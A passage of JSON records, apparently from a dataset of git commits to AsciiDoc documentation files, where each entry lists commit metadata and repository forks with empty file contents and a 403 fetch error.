Polish","message":"SEC-2951: Polish\n","repos":"ollie314\/spring-security,zshift\/spring-security,ractive\/spring-security,cyratech\/spring-security,panchenko\/spring-security,panchenko\/spring-security,raindev\/spring-security,follow99\/spring-security,chinazhaoht\/spring-security,thomasdarimont\/spring-security,eddumelendez\/spring-security,forestqqqq\/spring-security,spring-projects\/spring-security,diegofernandes\/spring-security,yinhe402\/spring-security,jmnarloch\/spring-security,ajdinhedzic\/spring-security,ollie314\/spring-security,diegofernandes\/spring-security,djechelon\/spring-security,thomasdarimont\/spring-security,pkdevbox\/spring-security,diegofernandes\/spring-security,likaiwalkman\/spring-security,jgrandja\/spring-security,zgscwjm\/spring-security,rwinch\/spring-security,caiwenshu\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,mdeinum\/spring-security,olezhuravlev\/spring-security,caiwenshu\/spring-security,mrkingybc\/spring-security,likaiwalkman\/spring-security,Peter32\/spring-security,yinhe402\/spring-security,Krasnyanskiy\/spring-security,chinazhaoht\/spring-security,mrkingybc\/spring-security,follow99\/spring-security,mparaz\/spring-security,zgscwjm\/spring-security,ollie314\/spring-security,mounb\/spring-security,jmnarloch\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,MatthiasWinzeler\/spring-security,xingguang2013\/spring-security,driftman\/spring-security,wkorando\/spring-security,forestqqqq\/spring-security,fhanik\/spring-security,wkorando\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,follow99\/spring-security,olezhuravlev\/spring-security,Peter32\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,SanjayUser\/SpringSecurityPro,zgscwjm\/spring-security,SanjayUser\/SpringSecurityPro,adairtaosy\/spring-security,hippostar\/spring-security,mounb\/spring-security,mdeinum\/spring-security,zhaoqin102\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,Krasnyanskiy\/spring-security,zshift\/spring-security,liuguohua\/spring-security,kazuki43zoo\/spring-security,jmnarloch\/spring-security,spring-projects\/spring-security,Krasnyanskiy\/spring-security,cyratech\/spring-security,ajdinhedzic\/spring-security,driftman\/spring-security,caiwenshu\/spring-security,yinhe402\/spring-security,xingguang2013\/spring-security,Xcorpio\/spring-security,thomasdarimont\/spring-security,thomasdarimont\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,Krasnyanskiy\/spring-security,zshift\/spring-security,ractive\/spring-security,mounb\/spring-security,jgrandja\/spring-security,panchenko\/spring-security,ajdinhedzic\/spring-security,cyratech\/spring-security,raindev\/spring-security,pkdevbox\/spring-security,jgrandja\/spring-security,zshift\/spring-security,panchenko\/spring-security,ractive\/spring-security,hippostar\/spring-security,pwheel\/spring-security,Xcorpio\/spring-security,ajdinhedzic\/spring-security,rwinch\/spring-security,kazuki43zoo\/spring-security,thomasdarimont\/spring-security,liuguohua\/spring-security,jgrandja\/spring-security,SanjayUser\/SpringSecurityPro,mparaz\/spring-security,rwinch\/spring-security,wkorando\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,forestqqqq\/spring-security,Xcorpio\/spring-security,mdeinum\/spring-security,mparaz\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,pwheel\/spring-security,MatthiasWinzeler\/spring-security,pkdevbox\/spring-security,SanjayUser\/SpringSecurityPro,kazuki43zoo\/spring-security,follow99\/spring-security,pwheel\/spring-security,MatthiasWinzeler\/spring-security,adairtaosy\/spring-security,cyratech\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,Xcorpio\/spring-security,spring-projects\/spring-security,MatthiasWinzeler\/spring-security,wkorando\/spring-security,caiwenshu\/spring-security,forestqqqq\/spring-security,hippostar\/spring-security,adairtaosy\/spring-security,Peter32\/spring-security,pkdevbox\/spring-security,olezhuravlev\/spring-security,rwinch\/spring-security,djechelon\/spring-security,zhaoqin102\/spring-security,zgscwjm\/spring-security,mounb\/spring-security,raindev\/spring-security,spring-projects\/spring-security,raindev\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,chinazhaoht\/spring-security,yinhe402\/spring-security,chinazhaoht\/spring-security,liuguohua\/spring-security,likaiwalkman\/spring-security,driftman\/spring-security,hippostar\/spring-security,liuguohua\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,ollie314\/spring-security,mdeinum\/spring-security,eddumelendez\/spring-security,Peter32\/spring-security,jmnarloch\/spring-security,diegofernandes\/spring-security,kazuki43zoo\/spring-security,xingguang2013\/spring-security,pwheel\/spring-security,zhaoqin102\/spring-security,olezhuravlev\/spring-security,zhaoqin102\/spring-security,driftman\/spring-security,xingguang2013\/spring-security,mparaz\/spring-security,djechelon\/spring-security,ractive\/spring-security,adairtaosy\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"13054bcbfa8671af72beaa8b7435cdcff9a6242b","subject":"Create 2017-01-25 Test asciidoc.adoc","message":"Create 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c93083a48ebbb4e5c369c49d6f0bff65b9eeccb","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5a2db414a64f778619ac823a0dc4fc1f74179ea","subject":"Update 2017-02-23.adoc","message":"Update 2017-02-23.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-23.adoc","new_file":"_posts\/2017-02-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e45e999ba93571b32d1197d65f2dcb09994237f0","subject":"Update 2017-12-17-.adoc","message":"Update 2017-12-17-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-17-.adoc","new_file":"_posts\/2017-12-17-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aed5e4e3c9a439bb56e0bebec556da75dcf046db","subject":"Update YubiKey_and_OpenVPN_via_PAM.adoc","message":"Update YubiKey_and_OpenVPN_via_PAM.adoc","repos":"madrat-\/yubico-pam,eworm-de\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam","old_file":"doc\/YubiKey_and_OpenVPN_via_PAM.adoc","new_file":"doc\/YubiKey_and_OpenVPN_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"70e7b67111c8425feadebb4c72280d42adf6e227","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7050e360535b26561c3d0bea0933e011e5ff9d3","subject":"Update 2015-09-15-title.adoc","message":"Update 2015-09-15-title.adoc","repos":"dawn-chiniquy\/clear-project.org,clear-project\/blog,dawn-chiniquy\/clear-project.org,clear-project\/blog,clear-project\/blog,dawn-chiniquy\/clear-project.org","old_file":"_posts\/2015-09-15-title.adoc","new_file":"_posts\/2015-09-15-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clear-project\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2b4f13c493b65fec6623530e7ab6aebeb7397d4","subject":"Update 2017-03-26-teste.adoc","message":"Update 2017-03-26-teste.adoc","repos":"carlosdelfino\/carlosdelfino-hubpress,carlosdelfino\/carlosdelfino-hubpress,carlosdelfino\/carlosdelfino-hubpress,carlosdelfino\/carlosdelfino-hubpress","old_file":"_posts\/2017-03-26-teste.adoc","new_file":"_posts\/2017-03-26-teste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlosdelfino\/carlosdelfino-hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af33b85ba98909b8002d6fcadfbd4bafde145b0a","subject":"Update 2016-10-24-Unable-to-locate-site-descriptor-maven-site-plugin-problem.adoc","message":"Update 2016-10-24-Unable-to-locate-site-descriptor-maven-site-plugin-problem.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2016-10-24-Unable-to-locate-site-descriptor-maven-site-plugin-problem.adoc","new_file":"_posts\/2016-10-24-Unable-to-locate-site-descriptor-maven-site-plugin-problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25a8294d80ecfdbc190ba768dfc41f56ee0bdec7","subject":"Update 2015-11-20-Ver-el-codigo-de-error-del-comando-anterior.adoc","message":"Update 2015-11-20-Ver-el-codigo-de-error-del-comando-anterior.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-20-Ver-el-codigo-de-error-del-comando-anterior.adoc","new_file":"_posts\/2015-11-20-Ver-el-codigo-de-error-del-comando-anterior.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1b95158515f9b756975ec3c6164d0c197552a9e","subject":"Updated index.adoc with planned phases for the project.","message":"Updated index.adoc with planned phases for the project.\n","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b20b120f176903d0585289fcda29cf6f7d62052","subject":"Update 2018-01-29-Node-Patterns.adoc","message":"Update 2018-01-29-Node-Patterns.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-01-29-Node-Patterns.adoc","new_file":"_posts\/2018-01-29-Node-Patterns.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"454d7c859da4f3a821783302ae940fb34d00eae5","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f7d698897194081c98a51f8209a8b51bd0f0cd8","subject":"Updated to reference new s-c-starter-config. Updated versions of boot and s-c-starter-parent in example pom.xml.","message":"Updated to reference new s-c-starter-config.\nUpdated versions of boot and s-c-starter-parent in example pom.xml.\n","repos":"rajkumargithub\/spring-cloud-config,mstine\/spring-cloud-config,marbon87\/spring-cloud-config,psbateman\/spring-cloud-config,royclarkson\/spring-cloud-config,fangjing828\/spring-cloud-config,marbon87\/spring-cloud-config,appleman\/spring-cloud-config,mstine\/spring-cloud-config,appleman\/spring-cloud-config,appleman\/spring-cloud-config,psbateman\/spring-cloud-config,psbateman\/spring-cloud-config,rajkumargithub\/spring-cloud-config,spring-cloud\/spring-cloud-config,rajkumargithub\/spring-cloud-config,shakuzen\/spring-cloud-config,spring-cloud\/spring-cloud-config,shakuzen\/spring-cloud-config,fangjing828\/spring-cloud-config,mbenson\/spring-cloud-config,mbenson\/spring-cloud-config,spring-cloud\/spring-cloud-config,thomasdarimont\/spring-cloud-config,thomasdarimont\/spring-cloud-config,fkissel\/spring-cloud-config,mstine\/spring-cloud-config,fkissel\/spring-cloud-config,royclarkson\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,marbon87\/spring-cloud-config,royclarkson\/spring-cloud-config,mbenson\/spring-cloud-config,thomasdarimont\/spring-cloud-config,shakuzen\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/quickstart.adoc","new_file":"docs\/src\/main\/asciidoc\/quickstart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"684d3d070ced0c73060f0b63e4f70588bc0236c0","subject":"Update 2016-04-01-First-Post.adoc","message":"Update 2016-04-01-First-Post.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-01-First-Post.adoc","new_file":"_posts\/2016-04-01-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54fd606a9cfcfb6388be4d8b435accf3bb95abbb","subject":"Remove clojurescript note on try monad doc.","message":"Remove clojurescript note on try monad doc.\n","repos":"funcool\/cats,yurrriq\/cats,mccraigmccraig\/cats,alesguzik\/cats,tcsavage\/cats,OlegTheCat\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"edb0ded618b7f46946651366ef626f8634c36010","subject":"Improved developers guide section on the documentation.","message":"Improved developers guide section on the documentation.\n","repos":"OlegTheCat\/cats,yurrriq\/cats,tcsavage\/cats,mccraigmccraig\/cats,funcool\/cats,alesguzik\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5e4fcefd8b0aea9574e7bce738f5db08db1a298d","subject":"Update 2016-03-15-Installing-Sentry-with-Docker.adoc","message":"Update 2016-03-15-Installing-Sentry-with-Docker.adoc","repos":"natsu90\/hubpress.io,natsu90\/hubpress.io,natsu90\/hubpress.io","old_file":"_posts\/2016-03-15-Installing-Sentry-with-Docker.adoc","new_file":"_posts\/2016-03-15-Installing-Sentry-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/natsu90\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd6c0bd02cb35b2d173f4e21073e385f5e99b9d7","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jax-rs\/crud\/readme.adoc","new_file":"jax-rs\/crud\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4deb866949efba67737fee16faddfba22e60952","subject":"Publish 20161110-1347.adoc","message":"Publish 20161110-1347.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1347.adoc","new_file":"20161110-1347.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3b98c7fe46d1ecfc6246b76fbc2282ad61c0afb","subject":"doc encoding support","message":"doc encoding support\n","repos":"juntalis\/ninja,ctiller\/ninja,ninja-build\/ninja,ilor\/ninja,vvvrrooomm\/ninja,sxlin\/dist_ninja,yannicklm\/ninja,Qix-\/ninja,lizh06\/ninja,nico\/ninja,maximuska\/ninja,atetubou\/ninja,atetubou\/ninja,jimon\/ninja,mgaunard\/ninja,maximuska\/ninja,martine\/ninja,PetrWolf\/ninja-main,barak\/ninja,metti\/ninja,iwadon\/ninja,autopulated\/ninja,ukai\/ninja,ikarienator\/ninja,guiquanz\/ninja,juntalis\/ninja,jendrikillner\/ninja,kimgr\/ninja,Ju2ender\/ninja,sorbits\/ninja,pathscale\/ninja,ndsol\/subninja,ThiagoGarciaAlves\/ninja,yannicklm\/ninja,mohamed\/ninja,chenyukang\/ninja,ThiagoGarciaAlves\/ninja,TheOneRing\/ninja,dpwright\/ninja,rjogrady\/ninja,ikarienator\/ninja,okuoku\/ninja,mgaunard\/ninja,vvvrrooomm\/ninja,ehird\/ninja,iwadon\/ninja,Qix-\/ninja,rjogrady\/ninja,tfarina\/ninja,dorgonman\/ninja,purcell\/ninja,ctiller\/ninja,nafest\/ninja,kimgr\/ninja,fifoforlifo\/ninja,colincross\/ninja,yannicklm\/ninja,ignatenkobrain\/ninja,dabrahams\/ninja,curinir\/ninja,glensc\/ninja,hnney\/ninja,tfarina\/ninja,glensc\/ninja,bradking\/ninja,metti\/ninja,curinir\/ninja,yannicklm\/ninja,ndsol\/subninja,guiquanz\/ninja,martine\/ninja,rnk\/ninja,ilor\/ninja,ikarienator\/ninja,maruel\/ninja,curinir\/ninja,dendy\/ninja,LuaDist\/ninja,pck\/ninja,TheOneRing\/ninja,jendrikillner\/ninja,jimon\/ninja,automeka\/ninja,juntalis\/ninja,jsternberg\/ninja,nafest\/ninja,lizh06\/ninja,hnney\/ninja,TheOneRing\/ninja,liukd\/ninja,sxlin\/dist_ninja,kissthink\/ninja,nafest\/ninja,juntalis\/ninja,pck\/ninja,pck\/ninja,barak\/ninja,ukai\/ninja,dpwright\/ninja,barak\/ninja,maruel\/ninja,ThiagoGarciaAlves\/ninja,mutac\/ninja,dabrahams\/ninja,bradking\/ninja,fifoforlifo\/ninja,dendy\/ninja,mydongistiny\/ninja,kissthink\/ninja,pathscale\/ninja,dorgonman\/ninja,purcell\/ninja,nickhutchinson\/ninja,Maratyszcza\/ninja-pypi,rjogrady\/ninja,drbo\/ninja,liukd\/ninja,mdempsky\/ninja,Maratyszcza\/ninja-pypi,nafest\/ninja,dorgonman\/ninja,ehird\/ninja,curinir\/ninja,colincross\/ninja,nocnokneo\/ninja,dorgonman\/ninja,ilor\/ninja,lizh06\/ninja,mutac\/ninja,vvvrrooomm\/ninja,ctiller\/ninja,TheOneRing\/ninja,fifoforlifo\/ninja,pathscale\/ninja,sorbits\/ninja,synaptek\/ninja,sorbits\/ninja,PetrWolf\/ninja-main,ninja-build\/ninja,ndsol\/subninja,nicolasdespres\/ninja,moroten\/ninja,mutac\/ninja,tfarina\/ninja,sgraham\/ninja,mgaunard\/ninja,ThiagoGarciaAlves\/ninja,lizh06\/ninja,mydongistiny\/ninja,ctiller\/ninja,metti\/ninja,purcell\/ninja,rnk\/ninja,syntheticpp\/ninja,kissthink\/ninja,syntheticpp\/ninja,metti\/ninja,chenyukang\/ninja,drbo\/ninja,jhanssen\/ninja,mutac\/ninja,kimgr\/ninja,sxlin\/dist_ninja,dpwright\/ninja,iwadon\/ninja,mdempsky\/ninja,kissthink\/ninja,ukai\/ninja,moroten\/ninja,guiquanz\/ninja,mgaunard\/ninja,AoD314\/ninja,maruel\/ninja,Qix-\/ninja,pathscale\/ninja,jendrikillner\/ninja,sorbits\/ninja,vvvrrooomm\/ninja,atetubou\/ninja,nocnokneo\/ninja,mdempsky\/ninja,sgraham\/ninja,jsternberg\/ninja,synaptek\/ninja,nico\/ninja,LuaDist\/ninja,PetrWolf\/ninja-main,purcell\/ninja,sxlin\/dist_ninja,iwadon\/ninja,ukai\/ninja,nickhutchinson\/ninja,dendy\/ninja,drbo\/ninja,dpwright\/ninja,AoD314\/ninja,Maratyszcza\/ninja-pypi,jhanssen\/ninja,sxlin\/dist_ninja,autopulated\/ninja,bmeurer\/ninja,syntheticpp\/ninja,ndsol\/subninja,nocnokneo\/ninja,PetrWolf\/ninja-main,mohamed\/ninja,hnney\/ninja,mydongistiny\/ninja,mydongistiny\/ninja,fuchsia-mirror\/third_party-ninja,glensc\/ninja,liukd\/ninja,fuchsia-mirror\/third_party-ninja,sxlin\/dist_ninja,maximuska\/ninja,bmeurer\/ninja,nicolasdespres\/ninja,fuchsia-mirror\/third_party-ninja,pck\/ninja,nicolasdespres\/ninja,martine\/ninja,jimon\/ninja,chenyukang\/ninja,fuchsia-mirror\/third_party-ninja,AoD314\/ninja,nico\/ninja,colincross\/ninja,ilor\/ninja,rnk\/ninja,syntheticpp\/ninja,jsternberg\/ninja,chenyukang\/ninja,automeka\/ninja,fifoforlifo\/ninja,ninja-build\/ninja,ehird\/ninja,ninja-build\/ninja,barak\/ninja,nicolasdespres\/ninja,bradking\/ninja,ikarienator\/ninja,rjogrady\/ninja,tfarina\/ninja,glensc\/ninja,bmeurer\/ninja,sxlin\/dist_ninja,atetubou\/ninja,synaptek\/ninja,Ju2ender\/ninja,sgraham\/ninja,jhanssen\/ninja,mohamed\/ninja,okuoku\/ninja,dendy\/ninja,ignatenkobrain\/ninja,moroten\/ninja,nocnokneo\/ninja,Qix-\/ninja,mohamed\/ninja,kimgr\/ninja,maximuska\/ninja,automeka\/ninja,liukd\/ninja,autopulated\/ninja,jimon\/ninja,jhanssen\/ninja,Ju2ender\/ninja,nickhutchinson\/ninja,rnk\/ninja,AoD314\/ninja,ehird\/ninja,mdempsky\/ninja,Maratyszcza\/ninja-pypi,colincross\/ninja,drbo\/ninja,nico\/ninja,automeka\/ninja,sgraham\/ninja,jsternberg\/ninja,guiquanz\/ninja,bmeurer\/ninja,synaptek\/ninja,ignatenkobrain\/ninja,martine\/ninja,hnney\/ninja,autopulated\/ninja,LuaDist\/ninja,moroten\/ninja,ignatenkobrain\/ninja,dabrahams\/ninja,okuoku\/ninja,nickhutchinson\/ninja,dabrahams\/ninja,bradking\/ninja,LuaDist\/ninja,Ju2ender\/ninja,okuoku\/ninja,maruel\/ninja,jendrikillner\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a10505930b668ba3dd35717d01d2c3beff6c7afc","subject":"v0.2 packet builder","message":"v0.2 packet builder\n","repos":"kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"packet_builder_yaml.asciidoc","new_file":"packet_builder_yaml.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d7200fff924632b0b8feb23d2e5fd9e5d74a3460","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46dd512df5b4e04df4cc7ae9767aad97c4602634","subject":"y2b create post THE GREATEST CABLE EVER","message":"y2b create post THE GREATEST CABLE EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-18-THE-GREATEST-CABLE-EVER.adoc","new_file":"_posts\/2016-06-18-THE-GREATEST-CABLE-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dcd82d39b1de1642aca46533427424fff12703a","subject":"Update 2017-12-19-P-H-Per-Golang.adoc","message":"Update 2017-12-19-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-19-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-19-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ddede8304456836246181d9d5450d5fa8bc6617","subject":"Adds or corrects documentation.","message":"Adds or corrects documentation.\n","repos":"cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp","old_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/steps-fileupload.adoc","new_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/steps-fileupload.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortizqgithub\/csoftz-rp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"986a331bac541c24a7cee68ed87d3bd8212792bb","subject":"Update 2016-11-21-Developpemen-de-lusae-de-la-Blockchain-dans-lagroalimentaire-a-la-fin-2017.adoc","message":"Update 2016-11-21-Developpemen-de-lusae-de-la-Blockchain-dans-lagroalimentaire-a-la-fin-2017.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2016-11-21-Developpemen-de-lusae-de-la-Blockchain-dans-lagroalimentaire-a-la-fin-2017.adoc","new_file":"_posts\/2016-11-21-Developpemen-de-lusae-de-la-Blockchain-dans-lagroalimentaire-a-la-fin-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b91561a53e9f0e64e6200bbc19b2e93d18637f80","subject":"add english docs for the component designs","message":"add english docs for the component 